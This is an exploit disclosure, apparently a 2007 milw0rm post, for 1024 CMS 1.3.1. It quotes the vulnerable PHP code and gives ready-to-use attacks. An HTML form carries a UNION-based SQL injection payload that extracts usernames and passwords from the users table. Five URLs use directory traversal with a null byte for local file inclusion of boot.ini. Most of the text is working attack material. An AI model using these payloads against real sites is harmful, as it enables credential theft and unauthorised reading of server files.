vuln.: 1024 CMS 1.3.1 (LFI/SQL) Multiple Vulnerabilities
  script info and download: http://www.1024cms.com

  author: irk4z[at]yahoo.pl
  greets to: str0ke, wacky
'-----------------------------------------------------------------------------'


# sql-injection:

 code:

   /admin/ops/findip/ajax/search.php:
   ...
 8     $get_users = mysql_query("SELECT id, username FROM ".$prefix."users WHERE ip='".$_POST['ip']."'") or die("cannot get ips: ".mysql_error());
   ...
   
   ^ if magic_quotes_gpc==off, we can get all usernames and passwords from database ;]

 exploit:
 
  <form method="POST" action="http://[host]/[path]/admin/ops/findip/ajax/search.php">
   <input style="width:600px" type="text" name="ip" value="z' AND 1=2 UNION SELECT 1,concat(username,0x20,password) FROM otatf_users/*" />
   <input type="submit" value="ok" />
  </form>


# local file inclusion:

 code:

   /admin/ops/reports/ops/download.php, /admin/ops/reports/ops/forum.php, /admin/ops/reports/ops/news.php:
   ...
 1     <?php
 2     include("./themes/".$admin_theme_dir."/templates/default_header.tpl");
   ...
 
   /pages/print/default/ops/news.php:
   ...
 5     if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
 6     include("./lang/".$lang."/news/default.php");
   ...

   /pages/download/default/ops/search.php:
   ...
 1     <?php
 2     include("./themes/".$theme_dir."/templates/default_header.tpl");
   ...


 exploits:

   http://[site]/[path]/admin/ops/reports/ops/download.php?admin_theme_dir=../../../../../../../../../boot.ini%00
   http://[site]/[path]/admin/ops/reports/ops/forum.php?admin_theme_dir=../../../../../../../../../boot.ini%00
   http://[site]/[path]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../boot.ini%00
   http://[site]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../../../../../boot.ini%00
   http://[site]/[path]/pages/download/default/ops/search.php?theme_dir=../../../../../../../../../boot.ini%00

# milw0rm.com [2007-12-21]